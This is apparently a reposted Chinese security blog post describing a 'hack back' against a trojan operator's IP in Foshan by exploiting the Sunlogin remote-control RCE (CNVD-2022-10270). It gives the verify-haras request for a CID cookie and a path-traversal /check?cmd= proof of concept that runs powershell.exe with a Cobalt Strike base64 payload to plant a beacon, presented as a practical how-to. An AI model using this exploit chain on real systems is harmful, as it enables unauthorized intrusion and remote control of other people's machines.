💡 背景
朋友溯源的时候一不小心打开的木马文件 该木马对注册表进行读写+远程下载文件+自动启动项 经过一些列的五花八门操作 最终锁定IP为 113.70.XX.XX经过查询为广东佛山某地
信息收集
不多说直接上图
发现开发高位端口 且响应有点眼熟 {"success":false,"msg":"Verification failure"} 网上搜索一下
向日葵REC???不多BB 直接开打
漏洞挖掘
用到的工具
BurpSuite 和CS
我这直接打开内置自带浏览器 访问 /cgi-bin/rpc?action=verify-haras
看到图中红色箭头的字段 表示有戏 copy一下该值 在头部的Cookie中的CID加入
我这里不一样是因为写文章的时候重新抓了包
生成Payload
打开CS 找到 攻击👉生成payload👉powershell 会自动生成b64powershell脚本代码
poc: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ (
+刚刚生成的powershll代码 (注意这里有个小坑 生成的代码有时候需要url编码一次 有时候不用)加号一定不能漏!!!!!然后查看反恐精英 上线成功!!!
总结
一开始上线本来是想使用powershell远程下载达到无文件落地执行的目的 不过中间可能因为版本问题 也可能因为符合表达式过于复杂 最终才选择用cs生成的paoload
两个重点:
1.向日葵REC CNVD-2022-10270
2.反恐精神生成powershell payload
3.参考
https://blog.csdn.net/fjjaylz/article/details/86663013
原文始发于微信公众号(CKCsec安全研究院):实战 | 向日葵RCE+无文件落地上线CS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论